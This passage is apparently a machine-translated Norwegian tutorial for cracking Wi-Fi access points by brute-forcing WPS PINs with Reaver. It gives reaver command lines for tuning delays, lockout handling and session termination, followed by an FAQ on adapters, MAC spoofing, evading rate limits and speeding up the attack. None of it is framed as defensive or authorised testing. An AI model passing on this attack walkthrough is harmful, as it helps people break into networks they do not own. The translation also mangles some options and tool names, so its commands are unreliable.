  4. Standardforsinkelsen mellom forsøkene er ett sekund. Den kan også konfigureres: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -d 0
  5. Noen tilgangspunkter kan blokkere WPS i en viss tid ved mistanke om at de blir kapret. Reaver merker denne situasjonen og pauser iterasjonen i 315 sekunder som standard, varigheten av denne pausen kan endres: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --lock-delay = 250
  6. Noen implementeringer av WPS-protokollen vil avslutte forbindelsen hvis PIN-koden er feil, selv om de etter spesifikasjonen må returnere en spesiell melding. Reaver gjenkjenner automatisk en slik situasjon, for dette er det et alternativ '-nack': # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --nack
  7. Alternativet '—eap-terminate' er designet for å fungere med de AP-ene som krever avslutning av WPS-økten ved å bruke EAP FAIL-meldingen: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --eap- terminere
  8. Feil i WPS-økten kan bety at AP begrenser antall forsøk på å taste inn PIN-koden, eller rett og slett er overbelastet med forespørsler. Informasjon om dette vil vises på skjermen. I dette tilfellet setter Reaver aktiviteten på pause, og pausetiden kan stilles inn med alternativet '—fail-wait': # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --fail-wait = 360

FAQ

Spørsmål: Hva slags trådløs adapter trenger jeg for å jailbreake?

Svar: Før du eksperimenterer, må du sørge for at den trådløse adapteren kan fungere i overvåkingsmodus. Den beste måten er å sjekke listen over støttet maskinvare på Aircrack-ng-prosjektsiden. Hvis spørsmålet oppstår om hvilken trådløs modul du skal kjøpe, kan du starte med hvilken som helst adapter basert på RTL8187L-brikkesettet. USB-dongler er enkle å finne online for $20.

Spørsmål: Hvorfor får jeg "timeout" og "out of order"-feil?

Svar: Dette skjer vanligvis på grunn av lav signalstyrke og dårlig forbindelse med tilgangspunktet. I tillegg kan tilgangspunktet midlertidig blokkere bruken av WPS.

Spørsmål: Hvorfor fungerer ikke forfalskning av MAC-adressen min?

Svar: Kanskje du forfalsker MAC-en til det virtuelle grensesnittet mon0, og dette vil ikke fungere. Du må spesifisere navnet på det virkelige grensesnittet, for eksempel wlan0.

Spørsmål: Hvorfor fungerer Reaver dårlig med et dårlig signal, selv om den samme WEP-crackingen fungerer bra?

Svar: Vanligvis skjer WEP-cracking ved å videresende de avlyttede pakkene for å oppnå flere initialiseringsvektorer (IVer) som kreves for en vellykket cracking. I dette tilfellet spiller det ingen rolle om en pakke gikk tapt eller på en eller annen måte ble skadet underveis. Men for et angrep på WPS, må du strengt overholde pakkeoverføringsprotokollen mellom tilgangspunktet og Reaver for å bekrefte hver PIN-kode. Og hvis en pakke samtidig går tapt, eller kommer i en uanstendig form, må du reetablere WPS-økten. Dette gjør angrep på WPS mye mer avhengig av signalstyrke. Det er også viktig å huske at hvis din trådløse adapter ser tilgangspunktet, betyr ikke dette at tilgangspunktet også ser deg. Så hvis du er den stolte eieren av en høyeffektsadapter fra ALFA Network og en antenne for et par dusin dBi, så ikke håp at du klarer å bryte alle fangede tilgangspunkter.

Spørsmål: Reaver sender den samme PIN-koden til tilgangspunktet hele tiden, hva er i veien?

Svar: Sjekk om WPS er aktivert på ruteren. Du kan gjøre dette med vaskeverktøyet: kjør det og sjekk at målet ditt er på listen.

Spørsmål: Hvorfor kan jeg ikke knytte til et tilgangspunkt?

Svar: Dette kan skyldes dårlig signalstyrke eller fordi adapteren din ikke er egnet for slike undersøkelser.

Spørsmål: Hvorfor får jeg stadig oppdagede feil med hastighetsbegrensende? Svar: Dette er fordi tilgangspunktet har blokkert WPS. Vanligvis er dette en midlertidig blokkering (omtrent fem minutter), men i noen tilfeller kan et permanent utestengelse bli gitt (oppheving kun gjennom det administrative panelet). Det er en ekkel feil i Reaver versjon 1.3, på grunn av hvilken fjerning av slike låser ikke oppdages. Som en løsning foreslås det å bruke "-ignore-locks"-alternativet eller laste ned den nyeste versjonen fra SVN.

Spørsmål: Kan jeg kjøre to eller flere Reaver-forekomster samtidig for å få fart på angrepet?

Svar: Teoretisk sett er det mulig, men hvis de hamrer på samme tilgangspunkt, vil brute-force-hastigheten neppe øke, siden den i dette tilfellet er begrenset av den svake maskinvaren til tilgangspunktet, som er lastet fullt ut med en angriper.